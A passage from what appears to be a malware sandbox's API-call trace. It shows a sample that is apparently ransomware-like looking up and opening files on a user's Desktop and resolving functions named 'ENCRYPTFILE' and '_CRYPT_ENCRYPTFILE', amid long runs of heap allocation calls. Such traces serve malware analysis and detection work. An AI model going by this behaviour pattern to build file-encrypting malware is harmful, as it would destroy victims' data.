ftCreationTime.dwHighDateTime=0x1d5eaec, ftLastAccessTime.dwLowDateTime=0x835e97a0, ftLastAccessTime.dwHighDateTime=0x1d5f0e1, ftLastWriteTime.dwLowDateTime=0x835e97a0, ftLastWriteTime.dwHighDateTime=0x1d5f0e1, nFileSizeHigh=0x0, nFileSizeLow=0xdae9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WMWtJGFcI6Q-91k75WQc.wav", cAlternateFileName="WMWTJG~1.WAV")) returned 0 [0127.548] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0127.548] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0127.549] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ff38d0, ftCreationTime.dwHighDateTime=0x1d5e475, ftLastAccessTime.dwLowDateTime=0x4b71c330, ftLastAccessTime.dwHighDateTime=0x1d5f11d, ftLastWriteTime.dwLowDateTime=0x4b71c330, ftLastWriteTime.dwHighDateTime=0x1d5f11d, nFileSizeHigh=0x0, nFileSizeLow=0x7ee3, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="WrCkWcj.m4a", cAlternateFileName="")) returned 0x41ac280 [0127.549] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0127.549] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0127.549] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0127.549] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0127.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0127.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0127.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0127.550] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\wrckwcj.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0127.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0127.550] FreeLibrary (hLibModule=0x772d0000) returned 1 [0127.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0127.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d70 [0127.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0127.551] CloseHandle (hObject=0x2a0) returned 1 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0127.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0127.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0127.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0127.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0127.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0127.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0127.552] FreeLibrary (hLibModule=0x772d0000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0127.552] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0127.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0127.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0127.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0127.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0127.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0127.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0127.553] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0127.800] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0127.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0127.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0127.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0127.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0127.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0127.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0127.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0127.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0127.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0127.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e00 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0127.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0127.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0127.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0127.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0127.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0127.802] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0127.803] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0127.803] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0127.803] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0127.803] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0127.803] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0127.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0127.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0127.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0127.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0127.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0127.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0127.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0127.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0127.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0127.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0127.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0127.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0127.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0127.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0127.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0127.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0127.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0127.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0127.806] HeapFree (in: hHeap=0x1780000, 